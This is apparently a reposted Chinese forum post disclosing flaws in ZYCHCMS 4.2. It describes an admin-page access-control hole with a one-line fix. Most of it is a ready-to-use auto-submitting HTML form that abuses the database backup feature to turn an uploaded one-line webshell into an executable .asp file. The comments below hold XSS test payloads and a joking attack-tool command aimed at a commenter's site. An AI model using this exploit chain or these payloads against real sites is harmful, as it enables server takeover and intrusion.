影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)

①SQL注射漏洞

漏洞文件:/admin/add_js.asp   &   /admin/add_xm_jiang.asp

漏洞原因:未过滤

漏洞代码:都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。

漏洞证明:我用官方演示站点做测试,如图1

修复方法:在文件开头加入代码

< !--#include file="seeion.asp"-->

②后台拿WBSHELL

进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。

这里在网上找了一个,改了下,将就着用。看效果如图2

以下是代码本地提交代码

<form method="post" action="http://localhost/admin/Manage_backup.asp?action=Backup" name=add>

<!--eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup-->
       <tr>
         <td height="30" background="images/bg_list.gif"><div style="padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left">备份数据库</div></td>
       </tr>
       <tr>
         <td bgcolor="#FFFFFF"><span class="back_southidc">

           </span>
           <table width="100%" border="0" align="center" cellpadding="5" cellspacing="0" >
             <tr onmouseover="style.backgroundColor='#EEEEEE'" onmouseout="style.backgroundColor='#F1F5F8'" bgcolor="#F1F5F8" >
               <td height="25" width="30%" class="td"><div align="left">当前数据库路径</div></td>
               <td width="70%" class="td">
                 <div align="left">
                   <input type="text" size="30" name="DBpath" value="此处为你在其网站上传的图片格式一句话路径" />

<!--eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>
                  <input type="hidden" size="50" name="bkfolder" value="123.asp" />
                </div></td>
             </tr>
             <tr onmouseover="style.backgroundColor='#EEEEEE'" onmouseout="style.backgroundColor='#FFFFFF'" bgcolor="#FFFFFF">
               <td height="25" width="30%" class="td"><div align="left">备份数据库名称</div></td>
               <td class="td"><div align="left">
                     <input type="text" size="30" name="bkDBname" value="4.mdb" />
                 [如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>
             </tr>
             <tr onmouseover="style.backgroundColor='#EEEEEE'" onmouseout="style.backgroundColor='#F1F5F8'" bgcolor="#F1F5F8">
               <td height="25" width="30%" class="td"><div align="left"></div></td>
               <td class="td"><div align="left">
                 <input type="submit" value="确定备份" class="btn"/>
               </div></td>
             </tr>
         </table></td></tr></form>
     </table>
     </td>
</tr>
</table>
<script>
document.all.add.submit();
</script>

转自:http://forum.90sec.org/viewthread.php?tid=3277&extra=page%3D1%26amp%3Borderby%3Ddateline%26amp%3Bfilter%3D2592000

留言评论(旧系统):

<script> @ 2012-08-07 19:25:12

<script>

本站回复:

<script>alert("好歹也测试点高级的吧,哎……")</script>

佚名 @ 2014-03-29 02:36:40

哈哈。太逗了。那我就来高级的。<script>alert('高级高级高级高级');</script>

本站回复:

<script>alert('好高级!');</script>

a1314.xyz @ 2015-11-07 20:41:56

我想测试一下自己网站 www.a1314.xyz 你来攻击吧

本站回复:

dir_exp.exe -s www.a1314.xyz